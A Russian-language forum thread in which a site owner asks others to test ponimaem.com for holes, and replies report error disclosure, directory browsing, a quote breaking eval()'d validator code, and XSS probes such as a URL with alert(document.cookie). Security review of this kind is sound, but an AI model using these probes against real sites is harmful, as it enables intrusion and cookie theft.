|
Добрый день.
Прошу проверить сайт ponimaem.com на наличие дырок. Буду очень благодарен. Прошу прошения, если тему создал не там. |
Добавляем спец.символы в куки,видим:
Код:
Warning: session_start() [function.session-start]: The session id contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in /home/otvetp/public_html/ponimaem.com/includes/header.php on line 25 |
Также есть возможность погулять по папкам
Код:
http://ponimaem.com/includes/5.0.91-community |
Подставляем ' в поле пароля видим
Код:
Warning: Unexpected character in input: ''' (ASCII=39) state=1 in /home/otvetp/public_html/ponimaem.com/includes/classes/validator.php(26) : eval()'d code on line 1 |
В гостевую требуется капча
|
Код:
http://ponimaem.com/gb/index.php?pg=&t=">alert(document.cookie) |
Parse error: syntax error, unexpected T_CONSTANT_ENCAPSED_STRING in /home/otvetp/public_html/ponimaem.com/includes/classes/validator.php(26) : eval()'d code on line 1
Нажимаем регистрация в поле вставляем ' |
XSS
http://ponimaem.com/test.php Форма: Код:
alert('xss') |
| Время: 06:15 |